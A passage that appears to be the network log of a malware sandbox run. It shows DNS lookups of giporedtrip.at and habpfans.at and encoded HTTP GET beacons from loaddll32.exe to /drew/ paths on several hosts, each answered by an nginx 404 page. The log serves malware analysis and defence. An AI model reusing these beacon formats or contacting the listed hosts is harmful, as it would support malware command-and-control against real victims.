Jan 26, 2022 17:06:16.600522995 CET	49827	80	192.168.2.5	61.36.14.230
Jan 26, 2022 17:06:16.919651031 CET	80	49827	61.36.14.230	192.168.2.5
Jan 26, 2022 17:06:16.919747114 CET	49827	80	192.168.2.5	61.36.14.230
Jan 26, 2022 17:06:16.920280933 CET	49827	80	192.168.2.5	61.36.14.230
Jan 26, 2022 17:06:17.439112902 CET	80	49827	61.36.14.230	192.168.2.5
Jan 26, 2022 17:06:18.136353016 CET	80	49827	61.36.14.230	192.168.2.5
Jan 26, 2022 17:06:18.136398077 CET	80	49827	61.36.14.230	192.168.2.5
Jan 26, 2022 17:06:18.136567116 CET	49827	80	192.168.2.5	61.36.14.230
Jan 26, 2022 17:06:18.136715889 CET	49827	80	192.168.2.5	61.36.14.230
Jan 26, 2022 17:06:18.455836058 CET	80	49827	61.36.14.230	192.168.2.5
Jan 26, 2022 17:06:38.157824993 CET	49828	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:06:38.188126087 CET	80	49828	31.214.157.187	192.168.2.5
Jan 26, 2022 17:06:38.188208103 CET	49828	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:06:38.188649893 CET	49828	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:06:38.218698025 CET	80	49828	31.214.157.187	192.168.2.5
Jan 26, 2022 17:06:38.456873894 CET	80	49828	31.214.157.187	192.168.2.5
Jan 26, 2022 17:06:38.508755922 CET	49828	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:06:39.579426050 CET	80	49816	194.76.226.200	192.168.2.5
Jan 26, 2022 17:06:39.579612017 CET	49816	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:06:39.787955999 CET	49816	80	192.168.2.5	194.76.226.200
Jan 26, 2022 17:06:39.808128119 CET	80	49816	194.76.226.200	192.168.2.5
Jan 26, 2022 17:07:09.449675083 CET	49828	80	192.168.2.5	31.214.157.187
Jan 26, 2022 17:07:09.480206013 CET	80	49828	31.214.157.187	192.168.2.5
Jan 26, 2022 17:07:09.482753038 CET	49828	80	192.168.2.5	31.214.157.187

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2022 17:04:10.702095032 CET	63183	53	192.168.2.5	8.8.8.8
Jan 26, 2022 17:04:10.821247101 CET	53	63183	8.8.8.8	192.168.2.5
Jan 26, 2022 17:04:32.537123919 CET	56969	53	192.168.2.5	8.8.8.8
Jan 26, 2022 17:04:32.720880985 CET	53	56969	8.8.8.8	192.168.2.5
Jan 26, 2022 17:05:54.678286076 CET	63732	53	192.168.2.5	8.8.8.8
Jan 26, 2022 17:05:54.987817049 CET	53	63732	8.8.8.8	192.168.2.5
Jan 26, 2022 17:06:16.351515055 CET	54450	53	192.168.2.5	8.8.8.8
Jan 26, 2022 17:06:16.595956087 CET	53	54450	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2022 17:04:10.702095032 CET	192.168.2.5	8.8.8.8	0xb2e	Standard query (0)	giporedtrip.at	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.537123919 CET	192.168.2.5	8.8.8.8	0x72f	Standard query (0)	habpfans.at	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.678286076 CET	192.168.2.5	8.8.8.8	0xdb34	Standard query (0)	giporedtrip.at	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.351515055 CET	192.168.2.5	8.8.8.8	0x5295	Standard query (0)	habpfans.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	211.119.84.112	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	183.78.205.92	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	210.92.250.133	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	187.232.235.234	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	183.100.39.157	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	203.228.9.102	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	41.41.255.235	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	186.6.45.193	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	197.44.54.172	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:10.821247101 CET	8.8.8.8	192.168.2.5	0xb2e	No error (0)	giporedtrip.at	151.251.30.69	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	41.41.255.235	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	186.6.45.193	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	197.44.54.172	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	151.251.30.69	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	211.119.84.112	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	183.78.205.92	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	210.92.250.133	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	187.232.235.234	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	183.100.39.157	A (IP address)	IN (0x0001)
Jan 26, 2022 17:04:32.720880985 CET	8.8.8.8	192.168.2.5	0x72f	No error (0)	habpfans.at	203.228.9.102	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	181.129.180.251	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	222.236.49.124	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	187.212.179.214	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	95.104.121.111	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	178.31.236.98	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	31.167.149.141	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	58.235.189.190	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	61.36.14.230	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	14.51.96.70	A (IP address)	IN (0x0001)
Jan 26, 2022 17:05:54.987817049 CET	8.8.8.8	192.168.2.5	0xdb34	No error (0)	giporedtrip.at	180.69.193.102	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	61.36.14.230	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	14.51.96.70	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	180.69.193.102	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	181.129.180.251	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	222.236.49.124	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	187.212.179.214	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	95.104.121.111	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	178.31.236.98	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	31.167.149.141	A (IP address)	IN (0x0001)
Jan 26, 2022 17:06:16.595956087 CET	8.8.8.8	192.168.2.5	0x5295	No error (0)	habpfans.at	58.235.189.190	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

194.76.226.200

giporedtrip.at

habpfans.at

31.214.157.187

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49758	194.76.226.200	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:03:50.217694044 CET	1190	OUT	GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.226.200
Jan 26, 2022 17:03:50.485863924 CET	1191	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:03:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49771	211.119.84.112	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:04:11.131587029 CET	8224	OUT	GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: giporedtrip.at
Jan 26, 2022 17:04:12.363171101 CET	11882	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:04:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49781	41.41.255.235	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:04:32.817919970 CET	17822	OUT	GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: habpfans.at
Jan 26, 2022 17:04:33.531102896 CET	17823	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:04:33 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49812	31.214.157.187	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:04:53.808751106 CET	17909	OUT	GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.214.157.187
Jan 26, 2022 17:04:54.068263054 CET	17910	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:04:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49816	194.76.226.200	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:05:34.308445930 CET	17926	OUT	GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.226.200
Jan 26, 2022 17:05:34.582305908 CET	17927	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:05:34 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 